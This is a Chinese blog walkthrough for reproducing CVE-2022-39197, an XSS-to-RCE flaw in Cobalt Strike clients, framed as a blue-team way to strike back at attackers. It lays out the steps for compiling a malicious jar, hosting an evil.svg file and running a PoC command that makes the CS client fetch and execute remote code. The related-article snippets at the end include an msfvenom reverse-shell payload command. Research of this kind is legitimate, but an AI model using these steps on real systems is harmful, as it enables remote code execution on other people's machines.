首页 > 其他分享 >蓝队反制之-Cobalt_Strike 反制

蓝队反制之-Cobalt_Strike 反制

时间:2023-12-27 11:33:51浏览次数:35  
标签:文件 蓝队 jar Cobalt CS 反制 木马 Strike

Cobalt_Strike <4.7.1 RCE (CVE-2022-39197)

01漏洞介绍

Cobalt Strike (CS) 是一个为对手模拟和红队行动而设计的平台,相当于增强版的Armitage,早期以Metasploit为基础框架,3.0版本之后作为独立平台开发,主要用于目标攻击和模拟后渗透行动。CS集成了端口转发、服务扫描、端口监听、木马生成、钓鱼攻击等功能,可以调用Mimikatz、Psexec等工具,与MSF进行联动,使用插件扩展功能,并且可以利用Malleable C2 profile 自定义通信流量特征,是内网大杀器,十分适合作为团队协同攻击工具使用。

由于Cobalt Strike 使用 GUI 框架 SWING开发,未经身份验证的远程攻击者可通过在 beacon 元数据中注入恶意 HTML 标签,与 Cobalt Strike 进行通信时,使得CS对其进行解析时加载恶意代码,从而在目标系统上执行任意代码使得CS对其进行解析时加载恶意代码,从而在目标系统上执行任意代码。

02漏洞危害

1、导致命令执行,服务器被入侵

2、内网被渗透,导致数据被窃取等风险

3、用户获取到使用Cobalt Strike的攻击者的木马样本后,反制正在使用Cobalt Strike 客户端的攻击者

03受影响的版本

Cobalt Strike <= 4.7

04漏洞复现

准备工具

1、Cobalt_Strike木马样本文件

2、漏洞验证POC/EXP

下载地址:https://github.com/its-arun/CVE-2022-39197

1、编辑恶意文件内容

编辑EvilJar\src\main\java\Exploit.java,更改第19行代码参数,我们本着验证的目的,就默认即可

2、编译文件

使用IDEA进行编译,具体步骤如图所示

编译完成后会在target目录下生成EvilJar-1.0-jar-with-dependencies.jar文件,也就是我们编译好的恶意文件

3、移动文件位置

将生成的恶意文件拷贝至serve路径下,同时将木马样本放在与cve-2022-39197.py脚本同一路径下

4、在serve路径下开启一个web服务

目标服务器可以访问即可

5、编辑evil.svg文件,将[attacker]替换为当前路径启用的web地址

6、执行POC脚本

python3 cve-2022-39197.py beacon.exe http://192.168.88.1:8080/evil.svg

运行后,cs客户端上可以看到此时木马已经成功上线

如果CS用户尝试获取用户会话的进程列表

当滚动进程列表点击当前会话所在进程时即触发xss,请求攻击者web服务上的evil.svg文件,而evil.svg文件又继续加载请求恶意文件EvilJar-1.0-jar-with-dependencies.jar,成功执行命令,从而达到RCE。

注意

运行了脚本后不要中途直接按Ctrl+C退出,这样不会结束木马的进程,木马程序还在后台运行着,让脚本自己结束或者自己手动结束进程,脚本运行100秒后会自动结束木马进程

展示

05修复建议

升级至 Cobalt Strike 4.7.2版本

相关jar包可在公众号获取

标签:文件,蓝队,jar,Cobalt,CS,反制,木马,Strike
From: https://www.cnblogs.com/hgschool/p/17930219.html

相关文章

  • 红队技巧12:cobaltstrike和msf相互联动
    前言我们在利用msf获取权限后有时候需要利用cobaltstrike的方便功能在利用cobaltstrike获取到权限后有时候需要利用msf的payload这时候就需要cobaltstrike和msf相互联动msf会话->cobaltstrike会话msf生成木马msfvenom-pwindows/meterpreter/reverse_tcplhost=192.168.30.......
  • 【内网渗透】隐藏cobaltstrike服务器—自定义证书+C2侧写
    简介自定义证书查看Cobaltstrike默认证书发现特征含有cobaltstrike关键字常用keytool命令查看证书文件:keytool-list-v-keystorexx.store修改证书密码:keytool-storepasswd-keystoretest.store修改alias别名:keytool-changealias-keystoretest.store-aliasso......
  • 【HTB】Sherlocks Hyperfiletable 蓝队 easy
    工具:analyzeMFT.py:https://github.com/dkovar/analyzeMFTanalyzeMFT:https://ericzimmerman.github.io/#!index.mdTask1问题:MFT的MD5哈希值是什么?certUtil-hashfilemft.rawmd5答案:3730c2fedcdc3ecd9b83cbea08373226Task2问题:系统上唯一用户的名称是什么?用anal......
  • 【HTB】Sherlocks Tracer 蓝队 easy
    .pf文件:windows预读取文件.evtx文件:日志文件$Extend:USN日志MFTECmd下载:https://ericzimmerman.github.io/#!index.mdEventLogExplorer下载:https://eventlogxp.com/download.php?s=1&u=bTask1问题:SOC团队怀疑对手潜伏在他们的环境中,并正在使用PsExec进行横向移动......
  • 【HTB】Sherlocks Lockpick 蓝队 easy
    全网首发工具:gHydra使用教程:https://www.secrss.com/articles/8829Task1问题:请确认用于加密所提供文件的加密密钥字符串?1、下载ghydra(本人这是第一次接触逆向,因此需要下载工具,后面步骤可能不太规范,望大佬请喷)ghydra #由于本地没有ghydra,因此kali会提示是否下载,输入Y......
  • 实网攻防演练丨面对鱼叉式网络钓鱼攻击,蓝队如何防御?
    大家好,我是i春秋的老朋友恶灵退散,95后安全运营工程师,信息安全专业,目前在职于中国某通信厂商做蓝军建设的工作。很高兴受邀i春秋的采访,在本期访谈中,我将给大家介绍下真实的实网攻防经历,以及作为蓝军的经验感悟和知识分享,如果你也是网络安全爱好者,或者对实网攻防感兴趣,欢迎阅读本篇......
  • 【HTB】Sherlocks-Bumblebee 蓝队 easy
    Task1题目:外部承包商的用户名是什么?外部承包商通过访客WiFi访问了Forela的内部论坛,他们似乎窃取了管理用户的凭据!通过内部论坛窃取管理用户的凭据,首先需要注册一个普通用户。通过访客WiFi访问,ip肯定是内网ip1、进入sqlite3tar-zxvfincident.tgz#解压sqlit......
  • 【HTB】Sherlocks-Litter 蓝队 easy
    Task1题目:乍一看,这次攻击似乎可疑的是哪种协议?首先查看协议统计可以发现,QUIC使用最多,其次是TCP,最后是DNS短时间内通过大量DNS数据包,比较奇怪答案:DNSTask2题目:我们的主机与另一台主机之间似乎存在大量流量,可疑主机的IP地址是多少?可以看见192.168.157.145、......
  • CF300E Empire Strikes Back
    EmpireStrikesBackLuoguCF300E题目描述给定\(k\)个数\(a_1,a_2,\dots,a_k\),求一个数\(p=n!\)使得\(p\)能被\(\prod_{i=1}^ka_i!\)整除。\(a_i\le10^7,k\le10^6\)Solution考虑先对\(\displaystyle\prod\limits_{i=1}^ka_i!\)分解质因数。假设分解出来为\(\d......
  • 红队开发学习----魔改cobaltstrike学习(持续更新)
    目录环境和工具准备反编译CobaltStrike_4.4_000.jarIdea项目HelloWorld测试代码去除凭证读取teamserver端配置修改端口证书profile配置JA3|JA3S/JARM指纹修改源码层面修改stager导致配置泄漏修改xor密钥(未进行,没研究明白,怕改崩了)修改stager下载路径的长度修复一个漏洞参考文......